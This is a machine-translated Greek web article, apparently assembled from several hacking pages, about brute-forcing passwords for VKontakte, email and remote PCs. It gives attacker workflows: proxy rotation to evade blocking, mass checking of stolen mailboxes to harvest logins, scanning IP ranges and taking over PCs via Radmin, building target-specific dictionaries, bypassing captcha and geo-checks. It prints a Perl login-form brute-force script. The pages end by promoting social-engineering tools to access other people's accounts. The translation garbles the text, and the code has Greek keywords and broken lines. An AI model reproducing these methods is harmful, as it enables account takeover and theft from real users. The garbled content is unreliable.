Προγράμματα για brute vk. Κωδικός ωμής δύναμης ωμή δύναμη. Απομακρυσμένη πειρατεία υπολογιστή

Η ωμή δύναμη (που προέρχεται από την αγγλική φράση: brute force) είναι ένας τύπος επίθεση χάκερ- ένας τρόπος για να χακάρετε λογαριασμούς συστήματα υπολογιστών, υπηρεσίες πληρωμών / τραπεζικών υπηρεσιών και σε ιστοσελίδες μέσω αυτοματοποιημένης επιλογής συνδυασμών κωδικών πρόσβασης και συνδέσεων.

Η ωμή δύναμη βασίζεται στην ομώνυμη μαθηματική μέθοδο (brute force), στην οποία η σωστή λύση - ένας πεπερασμένος αριθμός ή ένας συμβολικός συνδυασμός - βρίσκεται με ταξινόμηση σε διάφορες επιλογές. Στην πραγματικότητα, κάθε τιμή από ένα δεδομένο σύνολο πιθανών απαντήσεων (λύσεων) ελέγχεται για ορθότητα.

Η αρχή της λειτουργίας της ωμής βίας

Ο χάκερ γράφει ένα ειδικό πρόγραμμα για να μαντέψει κωδικούς πρόσβασης ή χρησιμοποιεί μια έτοιμη λύση των συναδέλφων του. Μπορεί να επικεντρωθεί σε μια συγκεκριμένη υπηρεσία αλληλογραφίας, ιστότοπο, κοινωνικό δίκτυο (δηλαδή, σχεδιασμένο για να χακάρει έναν συγκεκριμένο πόρο). Το επόμενο βήμα είναι η προετοιμασία για hacking. Αποτελείται από τα ακόλουθα βήματα:

  1. Σύνταξη λίστας μεσολάβησης

Για να αποκρύψετε την πραγματική διεύθυνση IP του υπολογιστή από τον οποίο θα πραγματοποιηθεί η επίθεση και να αποτρέψετε τον αποκλεισμό από τον ιστότοπο όπου είναι απαραίτητο να χακάρετε λογαριασμός, η σύνδεση στο Internet διαμορφώνεται μέσω διακομιστή μεσολάβησης.

Η αναζήτηση για διευθύνσεις/θύρες διακομιστή μεσολάβησης πραγματοποιείται στο διακομιστή μεσολάβησης (Proxy Grabber). Αυτό το βοηθητικό πρόγραμμα εξάγει ανεξάρτητα όλα τα δεδομένα για σύνδεση με ενδιάμεσους διακομιστές από τοποθεσίες που παρέχουν διακομιστές μεσολάβησης (καθορίζονται στη λίστα). Μαζεύεται δηλαδή ο πληρεξούσιος.

Η βάση που προκύπτει αποθηκεύεται σε ξεχωριστό αρχείο κειμένου. Στη συνέχεια, όλες οι διευθύνσεις διακομιστή που είναι διαθέσιμες σε αυτό ελέγχονται για λειτουργικότητα σε έναν έλεγχο διακομιστή μεσολάβησης. Αρκετά συχνά, τα προγράμματα που έχουν σχεδιαστεί για την αυτοματοποιημένη εξόρυξη μεσολάβησης συνδυάζουν τις λειτουργίες τόσο του αρπακτικού όσο και του ελεγκτή.

Ως αποτέλεσμα, λαμβάνουμε μια ολοκληρωμένη λίστα μεσολάβησης με τη μορφή λίστας IP/θύρας, αποθηκευμένη σε αρχείο txt. (Θα το χρειαστείτε κατά τη ρύθμιση του προγράμματος brute force).

  1. Βάσεις αναζήτησης για brute

Είναι απαραίτητο να συνδέσετε ένα λεξικό με ωμή βία - ένα συγκεκριμένο σύνολο συνδυασμών κωδικών πρόσβασης και συνδέσεων - το οποίο θα αντικαταστήσει στη φόρμα σύνδεσης. Επίσης, όπως και η λίστα μεσολάβησης, έχει τη συνηθισμένη μορφή λίστας αρχείο κειμένου(.κείμενο). Τα λεξικά, είναι επίσης βάσεις δεδομένων, διανέμονται μέσω φόρουμ χάκερ, τοποθεσιών και φιλοξενίας αρχείων. Πιο έμπειροι «τεχνίτες» τα δημιουργούν μόνοι τους και τα παρέχουν σε όλους έναντι αμοιβής. Όσο μεγαλύτερη είναι η βάση (ο αριθμός των συνδυασμών, οι συνδέσεις, οι λογαριασμοί), τόσο το καλύτερο (για έναν χάκερ) - τόσο μεγαλύτερη είναι η πιθανότητα επιτυχίας του hacking.

  1. Ρύθμιση ωμής βίας

Η λίστα μεσολάβησης έχει φορτωθεί. το πρόγραμμα επιλογής θα αλλάξει αυτόματα τον διακομιστή μεσολάβησης, έτσι ώστε ο διακομιστής ιστού να μην ανιχνεύει την επίθεση και, κατά συνέπεια, την πηγή (οικοδεσπότη) της επίθεσης.

Έχει συνδεθεί ένα λεξικό συνδυασμών κωδικών πρόσβασης/σύνδεσης. Ο αριθμός των νημάτων έχει οριστεί - πόσους συνδυασμούς θα ελέγξει ταυτόχρονα η ωμή δύναμη. Ισχυρός υπολογιστήςμε υψηλή ταχύτητα Διαδικτύου, αντιμετωπίζει με σιγουριά 120-200 ροές (αυτή είναι η βέλτιστη τιμή). Η ταχύτητα του brute εξαρτάται άμεσα από αυτή τη ρύθμιση. Για παράδειγμα, εάν ορίσετε μόνο 10 νήματα, η επιλογή θα είναι πολύ αργή.

  1. Εκτόξευση μιας ωμής δύναμης

Το πρόγραμμα καταγράφει επιτυχημένες απόπειρες hacking: αποθηκεύει χακαρισμένους λογαριασμούς (κωδικός πρόσβασης/σύνδεση) σε ένα αρχείο. Η διάρκεια της διαδικασίας επιλογής κυμαίνεται από αρκετές ώρες έως αρκετές ημέρες. Ταυτόχρονα, δεν αποδεικνύεται πάντα αποτελεσματικό λόγω της υψηλής κρυπτογραφικής σταθερότητας των δεδομένων σύνδεσης ή της εφαρμογής άλλων προστατευτικών μέτρων από την πλευρά του επιτιθέμενου.

Τύποι ωμής βίας

Προσωπικό hack

Κυνήγι για έναν συγκεκριμένο λογαριασμό - σε ένα κοινωνικό δίκτυο, σε μια υπηρεσία αλληλογραφίας κ.λπ. Μέσω ή κατά τη διαδικασία της εικονικής επικοινωνίας, ο εισβολέας αποσπά μια σύνδεση από το θύμα για πρόσβαση σε έναν ιστότοπο. Στη συνέχεια σπάει τον κωδικό πρόσβασης χρησιμοποιώντας τη μέθοδο brute-force: καθορίζει τη διεύθυνση του πόρου web και την εξαχθείσα σύνδεση με ωμή δύναμη, συνδέει το λεξικό.

Οι πιθανότητες ενός τέτοιου hack είναι μικρές, για παράδειγμα, σε σύγκριση με την ίδια επίθεση XSS. Μπορεί να είναι επιτυχής εάν ο κάτοχος του λογαριασμού χρησιμοποιούσε έναν κωδικό πρόσβασης 6-7 χαρακτήρων με έναν απλό συνδυασμό χαρακτήρων. Διαφορετικά, θα χρειαστούν χρόνια - δεκάδες και εκατοντάδες χρόνια, με βάση τους υπολογισμούς του μαθηματικού τύπου αναζήτησης, για να «ξεδιπλωθούν» πιο σταθερές επιλογές 12,15, 20 γραμμάτων, αριθμών και ειδικών χαρακτήρων.

Brutus/Check

Μια βάση δεδομένων με συνδέσεις/κωδικούς πρόσβασης από γραμματοκιβώτια του ενός υπηρεσία αλληλογραφίας(για παράδειγμα, mail.ru) ή διαφορετικό. Και η λίστα μεσολάβησης είναι για κάλυψη κεντρικού υπολογιστή (γιατί για πολλαπλά αιτήματα από μία διεύθυνση IP, υπηρεσίες web ΗΛΕΚΤΡΟΝΙΚΗ ΔΙΕΥΘΥΝΣΗανιχνεύσει πολύ γρήγορα την επίθεση).

Οι ωμές επιλογές περιλαμβάνουν μια λίστα λέξεων-κλειδιών (συνήθως ονόματα τοποθεσιών) - τα σημεία αναφοράς με τα οποία θα αναζητήσει δεδομένα σύνδεσης σε παραβιασμένα γραμματοκιβώτια (για παράδειγμα: steampowered, worldoftanks, 4game, VK). Ή μια συγκεκριμένη πηγή Διαδικτύου.

Ο χρήστης, που εγγράφεται σε διαδικτυακό παιχνίδι, κοινωνικό δίκτυο ή φόρουμ, όπως αναμένεται, υποδεικνύει το email του ( Γραμματοκιβώτιο). Η υπηρεσία Ιστού στέλνει ένα μήνυμα στην καθορισμένη διεύθυνση με δεδομένα σύνδεσης και έναν σύνδεσμο για επιβεβαίωση εγγραφής. Αυτά τα γράμματα αναζητά η ωμή βία για να εξάγει στοιχεία σύνδεσης και κωδικούς πρόσβασης από αυτά.

Πατήστε "START" και το cracker ξεκινά με ωμή δύναμη. Λειτουργεί σύμφωνα με τον ακόλουθο αλγόριθμο:

  1. Φορτώνει τη σύνδεση/κωδικό πρόσβασης στο email από τη βάση δεδομένων.
  2. Ελέγχει την πρόσβαση ή "ελέγχει" (εξουσιοδοτεί αυτόματα): εάν είναι δυνατή η σύνδεση στο λογαριασμό, επιλέγει ένα στη στήλη "καλή" (σημαίνει ότι βρέθηκε άλλο email που λειτουργεί) και ξεκινά την προβολή του (δείτε τις ακόλουθες παραγράφους) ; αν δεν υπάρχει πρόσβαση, το βάζει σε κακό (κακά).
  3. Σε όλα τα "guds" (ανοιχτά email), η brute force σαρώνει γράμματα σύμφωνα με το αίτημα που έχει θέσει ο χάκερ - δηλαδή αναζητά στοιχεία σύνδεσης / κωδικούς πρόσβασης στους καθορισμένους ιστότοπους και συστήματα πληρωμών.
  4. Όταν βρεθούν τα απαιτούμενα δεδομένα, τα αντιγράφει και τα καταχωρεί σε ξεχωριστό αρχείο.

Έτσι, υπάρχει μια μαζική «πειρατεία» λογαριασμών - από δεκάδες σε εκατοντάδες. Ο επιτιθέμενος διαθέτει τα αποκτηθέντα "τρόπαια" κατά την κρίση του - πώληση, ανταλλαγή, συλλογή δεδομένων, κλοπή χρημάτων.

Απομακρυσμένη πειρατεία υπολογιστή

Η ωμή βία, σε συνδυασμό με άλλα εργαλεία hacking, χρησιμοποιείται για να αποκτήσει απομακρυσμένη πρόσβαση στον υπολογιστή ενός θύματος που προστατεύεται με κωδικό πρόσβασης μέσω ενός καναλιού Διαδικτύου.

Αυτός ο τύπος επίθεσης αποτελείται από τα ακόλουθα βήματα:

  1. Πραγματοποιείται αναζήτηση για δίκτυα IP στα οποία θα πραγματοποιηθεί επίθεση σε υπολογιστές χρηστών. Οι περιοχές διευθύνσεων λαμβάνονται από ειδικές βάσεις δεδομένων ή μέσω ειδικών προγραμμάτων, όπως το IP Geo. Σε αυτό, μπορείτε να επιλέξετε δίκτυα IP για μια συγκεκριμένη κομητεία, περιοχή, ακόμη και πόλη.
  2. Τα επιλεγμένα εύρη IP και τα λεξικά επιλογής ορίζονται στις ρυθμίσεις του Lamescan brute force (ή του ισοδύναμου), που προορίζεται για απομακρυσμένη σύνδεση/κωδικό brute force. Μόλις ξεκινήσει, η Lamescan κάνει τα εξής:
  • πραγματοποιεί σύνδεση σε κάθε IP από την καθορισμένη περιοχή.
  • μετά τη δημιουργία μιας σύνδεσης, προσπαθεί να συνδεθεί με τον κεντρικό υπολογιστή (PC) μέσω της θύρας 4899 (αλλά ενδέχεται να υπάρχουν άλλες επιλογές).
  • εάν η θύρα είναι ανοιχτή: προσπάθειες πρόσβασης στο σύστημα, ωμή βία όταν σας ζητηθεί κωδικός πρόσβασης. Εάν είναι επιτυχής, αποθηκεύει τη διεύθυνση IP του κεντρικού υπολογιστή (υπολογιστή) και τις πληροφορίες σύνδεσης στη βάση δεδομένων του.

  1. Ο χάκερ λανσάρει το βοηθητικό πρόγραμμα Radmin, σχεδιασμένο για τη διαχείριση απομακρυσμένων υπολογιστών. Ορίζει τις συντεταγμένες δικτύου του θύματος (IP, σύνδεση και κωδικός πρόσβασης) και αποκτά τον πλήρη έλεγχο του συστήματος - την επιφάνεια εργασίας (εμφανίζεται οπτικά στην οθόνη του υπολογιστή του cracker), τους καταλόγους αρχείων, τις ρυθμίσεις.

Προγράμματα για brute

HASHCAT

Για το 2020, ένα από τα πιο ισχυρά προγράμματα για brute. Χρησιμοποιεί περισσότερους από 200 αλγόριθμους απαρίθμησης. Χρησιμοποιείται ευρέως για σπάσιμο κωδικών πρόσβασης WPA/WPA2, καθώς και κωδικών πρόσβασης για έγγραφα MS Office, PDF, 7-Zip, RAR, TrueCrypt.

Κλασική ωμή δύναμη, από τις πρώτες. Ωστόσο, δεν χάνει τη συνάφειά του και ανταγωνίζεται με νέες λύσεις. Διαθέτει έναν έξυπνο αλγόριθμο brute-force και υποστηρίζει όλα τα κύρια πρωτόκολλα Διαδικτύου - TCP / IP, POP3, HTTP, κ.λπ. Μπορεί να παραποιήσει cookies. Βυθιστείτε με ένα λεξικό και δημιουργήστε κωδικούς από μόνος του.

Ισχυρό brute-checker. Εξοπλισμένο με ένα εκτεταμένο οπλοστάσιο λειτουργιών για εργασία με βάσεις δεδομένων (έλεγχος, ταξινόμηση κατά τομείς). Υποστηρίζει διάφορους τύπους proxies, ελέγχει την απόδοσή τους. Εκτελεί σάρωση email σε γραμματοκιβώτια με βάση ρυθμίσεις όπως η ημερομηνία, λέξη-κλειδί, διεύθυνση, μη αναγνωσμένα μηνύματα. Μπορείτε να κάνετε λήψη επιστολών από το Mail.ru και το Yandex.

Brute force - brute force, brute force hacking
Στο άρθρο "" ειπώθηκε ότι ήταν αδύνατο να χακάρετε το VK με ωμή βία (πρόγραμμα).
Αυτό δεν είναι απολύτως αλήθεια, υπάρχουν ακόμα κενά...
Παρακάτω είναι ένα λειτουργικό σενάριο, αλλά πρώτα…

Στο κάτω μέρος του άρθρου - ένα δωρεάν πρόγραμμα για τη δημιουργία ενός βάναυσου λεξικού και μια λίστα με "κωδικούς πρόσβασης κορυφαίων loch"

Επιφυλάσσομαι εκ των προτέρων ότι μιλάμε για την κλασική "brute force" χωρίς κανέναν αλγόριθμο PBKDF2, χωρίς ανάλυση του sha hash, γιατί Σε επίπεδο νοικοκυριού, αυτό είναι ένα συντριπτικό έργο.

Υπάρχουν πολλά προγράμματα "για πειρατεία VK με ωμή βία" στο δίκτυο

Ποιο να διαλέξω; Τι θα βοηθήσει (χωρίς να με βλάψει);
- Κανένα

Κάθε λογαριασμός VK απαιτεί προσωπική προσέγγιση και τα προγράμματα προτύπων από το δίκτυο είναι όλα χάλια, διαζύγια, μαλακίες.

Τώρα θα καταλάβετε γιατί. Μαθηματικό μέρος συνοπτικά.

Το ελάχιστο μήκος ενός κωδικού πρόσβασης VK είναι 6 χαρακτήρες.

Ο κωδικός πρόσβασης πρέπει να περιέχει:
αριθμοί(0-9 - 10 επιλογές),
επιστολές(a-z - 26 στα λατινικά),
κεφαλαία γράμματα(Το Α-Ω είναι επίσης 26)

Σύνολο για κάθε σύμβολο - 10+26+26=62 (!) επιλογές, άρα ο αριθμός των συνδυασμών για:
Κωδικός πρόσβασης 6 χαρακτήρων - 56.800.235.584 (56,8 δισεκατομμύρια)
Κωδικός πρόσβασης 7 χαρακτήρων - 3.521.614.606.208 (3,5 τρισεκατομμύρια)
Κωδικός πρόσβασης 8 χαρακτήρων - 218 340 105 584 896 (218 τρισεκατομμύρια)
Κωδικός πρόσβασης 9 χαρακτήρων -13 537 086 546 263 600

Δεν γνωρίζουμε το μήκος του κωδικού πρόσβασης, επομένως θα πρέπει να πληκτρολογήσουμε ένα εύρος τουλάχιστον 6-8 χαρακτήρων
Σύνολο: 6+7+8 χαρακτήρες = 221.918.520.426.688 (222 τρισεκατομμύρια) επιλογές

Ας υποθέσουμε ότι έχετε έναν αρκετά καλό υπολογιστή, αλλά τίθεται το ερώτημα - πόσα αιτήματα στον διακομιστή VK μπορεί να κάνει;
Πόσο γρήγορος είναι ο υπολογιστής του σπιτιού σας;

Ας υπολογίσουμε. Για να το κάνετε αυτό, ανοίξτε γραμμή εντολών(Έναρξη - Αξεσουάρ - Γραμμή εντολών ή εκτελέστε τη διαδικασία cmd.exe)
Οδηγούμε στην εντολή, παίρνουμε την απάντηση διακομιστή

"Απόκριση από .....ώρα 134 ms" (αυτή είναι η δική μου, ο χρόνος σας μπορεί να διαφέρει)

Ο χρόνος ping είναι ο χρόνος που χρειάζεται για να ταξιδέψει ένα σήμα από το μηχάνημά μας στον διακομιστή και πίσω

Υπάρχουν 1000 χιλιοστά του δευτερολέπτου (ms) σε ένα δευτερόλεπτο, άρα
Ο ρυθμός brute από το μηχάνημά σας (αιτήματα / δευτερόλεπτα) θα είναι = 1000 / χρόνος απόκρισης
Στην περίπτωσή μου 1000/134ms = 7,4 αιτήματα (password) ανά δευτερόλεπτο

Πόσος χρόνος θα χρειαστεί για την ταξινόμηση των κωδικών πρόσβασης για το VK;

Επιτρέψτε μου να σας υπενθυμίσω ότι επαναλαμβάνουμε περισσότερες από 221.918.520.426.688 (222 τρισεκατομμύρια) επιλογές κωδικού πρόσβασης.

Επομένως, για να μάθουμε πόσο θα σπάσουμε τον κωδικό πρόσβασης VK με ωμή βία, διαιρούμε τον αριθμό με την ταχύτητα, δηλ.

221918520426688 κωδικοί πρόσβασης / 7,4 κωδικοί πρόσβασης ανά δευτερόλεπτο = 29737081737176sec = 495618028953 min = 8260300483 ώρες = 344179187 ημέρες = 942957 χρόνια

Συμπέρασμα:ένα πραγματικό πρόγραμμα για το hacking VK θα μπορούσε να πάρει έναν κωδικό πρόσβασης με ωμή βία για 94 χιλιάδες χρόνια.

Ερώτηση: Τι γίνεται όμως με τα βίντεο στο YouTube, στα οποία θαυματουργά προγράμματα βλάπτουν τη σελίδα VK σε λίγα λεπτά / ώρες;
Απαντώ: Αυτή είναι μια απάτη που δημιουργήθηκε για να μολύνει τον υπολογιστή σας για να κλέψει τα δικά σας δεδομένα. Ούτε περισσότερο, ούτε λιγότερο.

Μπορείτε να επιταχύνετε σημαντικά τη διαδικασία αναζήτησης!
Για αυτό χρειάζεστε:
1. Ενίσχυση υπολογιστική ισχύς. Για παράδειγμα, μολύνετε 1.000.000 υπολογιστές άλλων ανθρώπων και ταυτόχρονα βλάπτετε το VK από όλους τους (ήδη αστείο)
2. Συντομεύστε το άγριο λεξικό, για παράδειγμα, σε μερικές χιλιάδες (σύμφωνα με την αρχή της κοινωνικής μηχανικής)

Πώς να φτιάξετε ένα βάναυσο λεξικό;
1. Στυλό στο πρόγραμμα σημειωματάριο (notepad.exe)
2. Prog "brute generator" (σύνδεσμος στο κάτω μέρος του άρθρου)

Αυτό το βάναυσο - το λεξικό είναι γεμάτο με πραγματικές επιλογές.

Οι πραγματικές είναι αυτές που συνδέονται τουλάχιστον με κάποιο τρόπο με το άτομο που έχει παραβιαστεί:

-τηλέφωνα(αυτός, οι συγγενείς, οι φίλοι του)
Παράδειγμα- αριθμοί με + 7, 8, χωρίς 8 - σπάνια συναντώνται

- ημερομηνίες γέννησης(αυτός, οι συγγενείς του, οι συγγενείς του)
Παράδειγμα- (της ίδιας ημερομηνίας) 010118, 01012018, 20180101, 180101 - συναντάται συχνά

- Ονόματα αγαπημένων προσώπων
Παράδειγμα- SashaMaria, MariaIvanova, SaNoMaIv - μέσος όρος

Όνομα τοποθεσίας (ή επώνυμο) σε διαφορετική διάταξη
Παράδειγμα, εάν πληκτρολογήσετε τη λέξη "vkontakte" στη ρωσική διάταξη, λαμβάνετε - "mlshtefleu" - ένα τέτοιο σχήμα βρίσκεται πολύ συχνά σε όλους τους ιστότοπους.

- Η λίστα του Loch με τους κωδικούς πρόσβασης για το brute(λίστα με τους πιο συνηθισμένους κωδικούς πρόσβασης στο δίκτυο - σύνδεσμος στο τέλος του άρθρου)

Πόσος χρόνος χρειάζεται για να γραφτεί ένα λεξικό;Λοιπόν, όχι πραγματικά - μισή ώρα είναι αρκετή για τα μάτια. Ποιος είπε ότι θα ήταν εύκολο;

Ας υποθέσουμε ότι έχουμε ένα λεξικό που δημιουργήθηκε από το brute και ένα πρόγραμμα εργασίας για την επιλογή κωδικού πρόσβασης VK (ή μη αυτόματη καταχώριση σε λεξικό).

Υπάρχει ένα σημαντικό πρόβλημα - το σύστημα προστασίας διακομιστή.

Στην πραγματικότητα, η παρέμβασή του έγκειται στο γεγονός ότι με πολύ συχνά αιτήματα, ο διακομιστής μπλοκάρει βλακωδώς (προσωρινά) την IP σας. Επιπλέον, εάν εργάζεστε με το VK μέσω της τυπικής φόρμας εισαγωγής (HTML \ FORM), τότε μετά από 3 ανεπιτυχείς προσπάθειες, η VK θα σας ζητήσει να εισαγάγετε ένα captcha.

ΣΕ παλιά εκδοχήΗ VK θα μπορούσε απλώς να μεταβεί στην έκδοση για κινητά - m.vk.com, τώρα έκδοση για κινητάως εκ τούτου, όχι - το 2016 έκαναν ένα ενιαίο προσαρμοστικό σχέδιο.

Πώς να παρακάμψω το VKontakte captcha;

Το VK απαιτεί την εισαγωγή captcha μετά από 3 ανεπιτυχείς προσπάθειες (η επανεκκίνηση του F5 δεν βοηθάει), αλλά πώς το ξέρει αυτό είσαι εσύνα κάνετε πολλές προσπάθειες σύνδεσης;

Με IP
- Cookies, cache και JavaScript

Δεν υπάρχουν προβλήματα με τα cookies, την προσωρινή μνήμη και το JavaScript - μπορείτε απλά να τα απενεργοποιήσετε στις ρυθμίσεις του προγράμματος περιήγησής σας.

Η IP μπορεί να αλλάξει εγκαθιστώντας ένα πρόγραμμα για αλλαγή IP - δεν υπάρχει τίποτα δύσκολο σε αυτό, υπάρχουν πολλά από αυτά στο δίκτυο (το Google για βοήθεια)

Μπορεί να χρησιμοποιηθεί πρόγραμμα περιήγησης TOR(ποιος δεν ξέρει - αυτό είναι ένα πρόγραμμα περιήγησης για ανώνυμη πλοήγηση στο διαδίκτυο, αλλάζει επίσης διευθύνσεις IP με κάθε νέα συνεδρία, κάτι χρήσιμο ειδικά για όσους σερφάρουν ή εργάζονται στο SAR)

Αλλά σχεδόν εντελώς αναιρεί όλες τις προσπάθειες απαρίθμησης της γεωγραφικής θέσης.

Ο διακομιστής VK θυμάται πού (γεωγραφικά) έγινε η τελευταία σύνδεση.

Και αν η IP σας είναι από άλλη τοποθεσία, τότε (πιθανώς) θα εμφανιστεί μια επιγραφή:

"Προσπαθείτε να συνδεθείτε ως Ιβάν Ιβάνοφ από μια ασυνήθιστη τοποθεσία."

Για να επιβεβαιώσετε ότι είστε πράγματι ο κάτοχος της σελίδας, καταχωρίστε όλα τα ψηφία που λείπουν από τον αριθμό τηλεφώνου στον οποίο είναι συνδεδεμένη η σελίδα.

Σενάριο για ωμές φόρμες ιστού (όπως το πρόγραμμα hacking VK)

Σπουδαίος! Στον διακομιστή VK υπάρχει ένα σενάριο που παρακολουθεί τη συχνότητα αποστολής πακέτων, δηλ. αν χτυπήσετε με ταχύτητα N φορές / δευτερόλεπτο, θα αποσταλεί αυτόματα στη λίστα απαγόρευσης μέσω IP.
Η VK χρησιμοποιεί επίσης GEOtracking.

Χωρίς δυναμική IP, δεν πρέπει να κάνετε βίαια και να προσπαθήσετε, ένα VPN μπορεί να σας βοηθήσει.
Προσωπικά, θεωρώ ότι οι κωδικοί πρόσβασης brute force VK δεν είναι πολλά υποσχόμενοι, αλλά για τους γνώστες θα δημοσιεύσω ένα παλιό σενάριο Pearl δανεισμένο από το 5p4x2knet a.k.a. Αποκαλυπτικά και λίγο σταθερά.

Το σενάριο λειτουργεί με τη μέθοδο POST με δύο μόνο παραμέτρους - ΣύνδεσηΚαι Κωδικός πρόσβασης.

Εάν η σύνδεση είναι γνωστή (για παράδειγμα, ένας αριθμός τηλεφώνου), τότε απλώς συμπληρώστε τα αντίστοιχα πεδία με μια τιμή χωρίς να χρησιμοποιήσετε λεξικό.

Κρυφά πεδία - captcha, το σενάριο δεν θα στείλει εικόνες, κρύψτε την πηγή των αιτημάτων (εσείς) όπως περιγράφεται παραπάνω.

Εδώ είναι χρήσιμο το υγιές λεξικό που συντάξαμε στην αρχή του άρθρου. (Ας το ονομάσουμε, για παράδειγμα, brut.txt )

Χρειαζόμαστε επίσης ένα αρχείο από το οποίο θα λαμβάνει πληροφορίες το πρόγραμμά μας.

Το πρόγραμμα θα εξαναγκάσει όλα τα σενάρια που καθορίζονται σε αυτό το αρχείο.( infa.txt). Εάν υπάρχει μόνο ένα σενάριο, τότε μπορείτε να το αντικαταστήσετε

Φυσικά, το αρχείο για την καταγραφή των αποτελεσμάτων ( result.txt)

Ετσι,
{
#σύνδεση αντικειμένου
$usagent = LWP::UserAgent
#open το αρχείο με πληροφορίες (αν δεν μπορούμε να το ανοίξουμε, βγείτε).
# ρίξτε το αρχείο στον πίνακα @infa και κλείστε το. (αν υπάρχει μόνο ένα σενάριο, τότε μπορεί να καθοριστεί αμέσως)
άνοιγμα(INFA, ";
κλείσιμο (INFA);

#ανοιχτό βάναυσο λεξικό
open(BRUT, ";
κλείσιμο (BRUT);

#άνοιγμα του αρχείου με τα αποτελέσματα (προσαρτάται στο τέλος).
άνοιγμα(ΑΠΟΤΕΛΕΣΜΑ, ">>$ARGV");
βρόχος #start
foreach $name (@infa)
{
#separate URL, στοιχεία σύνδεσης, μεταβλητές και πληροφορίες σφάλματος
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#show URL
εκτύπωση "$url...n";
# ξεκινήστε έναν άλλο βρόχο
foreach $brut (@brut)
{
#kill spaces και newlines
$pss =~ s/ //;
$pss =~ s/n//;

#σύνδεση νέου αντικειμένου
$usagent = LWP::UserAgent->new();
#δημιουργία ερωτημάτων.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");

#και το στέλνω
$result = $usagent -> request($req);
#write αποτελέσματα σε μια μεταβλητή
$res = $result->content;
#εάν αποτύχει, δημιουργείται ένα μήνυμα σφάλματος
if($res!~ /$failed/i)
{
#output μήνυμα με κωδικό πρόσβασης. ρεκόρ σε αποτελέσματα·
εκτύπωση "brutword βρέθηκε. Δεν είναι $pssnn";
εκτύπωση ΑΠΟΤΕΛΕΣΜΑΤΟΣ "URL: $urlnLOGIN: $loginnBRUT: $pssnn";

#διαφορετικά συνεχίστε την επιλογή
τελευταίος;
}
}
}
#closing αρχείο result.txt
κλείσιμο(ΑΠΟΤΕΛΕΣΜΑ);

Ναι υπάρχει. Γενικά, υπάρχουν πολλά τέτοια προγράμματα.

Και είμαστε ενάντια σε τέτοια προγράμματα.

Αλλά επειδή υπάρχει κάποια ζήτηση για τέτοια προγράμματα, ας ρίξουμε μια ματιά στο ποια από αυτά είναι «σχετικά» νόμιμα και ποια είναι καλύτερα να μην χρησιμοποιήσετε καθόλου.
Αρχικά, υπάρχουν, από την ίδια τη δημιουργία του VKontakte, για παράδειγμα, προγράμματα όπως οι εφαρμογές ωμής βίας.
Τέτοια προγράμματα ασχολούνται με την απαρίθμηση όλων των κωδικών πρόσβασης που υπάρχουν. Για αυτό, τόσο οι συμβατικοί αλγόριθμοι με βήμα προς βήμα απαρίθμηση, όσο και οι λεγόμενοι. Πίνακες Rainbow, στους οποίους οι τιμές είναι διασκορπισμένες τυχαία σύμφωνα με την καλύτερη κατανομή - όπως επινοήθηκε από τους συγγραφείς τελευταία προγράμματα, η τυχαία διανομή μπορεί να μειώσει τον χρόνο αναζήτησης κωδικού πρόσβασης, επειδή η αναζήτηση δεν θα γίνει από την αρχή, αλλά τυχαία και κατά μέσο όρο η διαδρομή προς το επιθυμητό γράμμα θα είναι μικρότερη.
Δεν συνιστούμε καθόλου τη χρήση προγραμμάτων brute force.Υπάρχει μια ποικιλία προγραμμάτων για την παραβίαση του VKontakte και επομένως είναι καλύτερο να μην χρησιμοποιείτε αγενές "σπάσιμο" στη σελίδα, επιπλέον, ο ίδιος ο χρήστης μπορεί να υποψιαστεί κάτι και να διαγράψει τη σελίδα ξεκινώντας μια άλλη ή να αλλάξει τη διεύθυνσή της. Και εκτός αυτού, η διοίκηση της VK θα σας αποκλείσει μέσω IP και ενδέχεται να κινήσει νομικές διαδικασίες για επίθεση στους διακομιστές σύνδεσης και παραβίαση της σταθερότητάς τους, καθώς και απόπειρα διείσδυσης στην αλληλογραφία κάποιου άλλου.

Έτσι, τα προγράμματα για την παραβίαση του VKontakte με χρήση ωμής βίας είναι παράνομα. Τι άλλο υπάρχουν;

Σε γενικές γραμμές, θα έχετε πάντα χρόνο να κατεβάσετε δωρεάν το πρόγραμμα για το hacking VKontakte. Στην πραγματικότητα υπάρχουν πολλά από αυτά. Ας δούμε ποιοι είναι οι νόμιμοι τρόποι διείσδυσης στη σελίδα κάποιου άλλου.
Πρώτα απ 'όλα, αυτές είναι εφαρμογές. Οι εφαρμογές έχουν τεράστιο όγκο πληροφοριών για τον χρήστη. Συνήθως, οι χρήστες δεν διαβάζουν τις προτροπές που εκδίδονται πριν από την εκκίνηση της εφαρμογής. Και εκεί, μόνο η εφαρμογή έχει πλήρη πρόσβαση σε προσωπικά δεδομένα, μια λίστα φίλων, έναν τοίχο κ.λπ. Τα προσωπικά μηνύματα, φυσικά, παραμένουν άγνωστα στην εφαρμογή, αλλά Γνωρίζοντας τον κολοσσιαίο όγκο προσωπικών πληροφοριών που κρύβονταν προηγουμένως πίσω από τις ρυθμίσεις απορρήτου, μπορείτε να εξαλείψετε απάτες κοινωνικής μηχανικής και να συμμετάσχετε σε «δελεασμό» πληροφοριών σχετικά με τον χρήστη από τους στενότερους φίλους του.
Ωστόσο, ούτε αυτό είναι απολύτως νόμιμο - ενδέχεται να προκύψουν προβλήματα λόγω του γεγονότος ότι εάν ο χρήστης μαντέψτε ότι ήταν η εφαρμογή που «διέρρευσε» τα δεδομένα, τότε, φυσικά, θα υποβάλει καταγγελία εναντίον του και η εφαρμογή θα αποκλειστεί.Σε γενικές γραμμές, η μέθοδος είναι καλή, αλλά γρήγορα πέφτει υπό υποψία. ναι και η υποβολή μιας αίτησης εξακολουθεί να είναι μια ταλαιπωρία.
Προχώρα.

Πού μπορώ να κατεβάσω κανονικά ένα πρόγραμμα για την παραβίαση σελίδων VKontakte, το οποίο θα είναι νόμιμο;

Πρώτα απ 'όλα, ας ορίσουμε - είμαστε ικανοποιημένοι μόνο με την κοινωνική μηχανική. Κατ' αρχήν, όταν χρησιμοποιείται σωστά, η κοινωνική μηχανική θα μας βοηθήσει να λάβουμε όλα τα δεδομένα που χρειαζόμαστε από τον χρήστη χωρίς να παραβιάζουμε τη σελίδα του. Αν και μπορείτε επίσης να έχετε πλήρη πρόσβαση στη σελίδα.
Λοιπόν, ποια είναι τα κοινωνικά προγράμματα για το hacking VKontakte που μπορείτε να κατεβάσετε δωρεάν;
Πρώτα απ 'όλα, αξίζει να σημειωθεί το bot Brobot.
